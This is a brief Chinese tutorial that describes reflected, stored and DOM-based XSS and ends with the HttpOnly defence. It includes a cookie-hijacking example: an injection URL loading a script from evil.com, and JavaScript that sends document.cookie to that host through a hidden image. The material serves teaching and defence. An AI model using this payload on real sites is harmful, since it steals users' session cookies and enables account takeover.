类型一:反射型XSS
简单地把用户输入的数据“反射”给浏览器。也就是说,黑客需要诱使用户“点击”一个恶意链接,才能攻击成功。
类型二:存储型XSS
把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。
类型三:DOM Based XSS
通过修改页面DOM节点形成的XSS,称之为DOM Based XSS。
XSS Payload:
XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些完成各种具体功能的恶意脚本,被称为”XSS Payload“。
XSS Payload实际上就是JavaScript脚本。
Cookie劫持案例:
http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js></script>
Payload写在这个远程脚本中,避免直接在URL的参数里写入大量的JavaScript代码。在evil.js中,可通过如下代码窃取Cookie:
var img = document.createElement("img"); img.src = "http://www.evil.com/log?"+escape(document.cookie); document.body.appendChild(img);
这段代码在页面插入了一张看不见的图片,同时把document.cookie对象作为参数发送到远程服务器。
Cookie的”HttpOnly“标识可以防止”Cookie劫持“。
原文:https://www.cnblogs.com/lwfiwo/p/10620219.html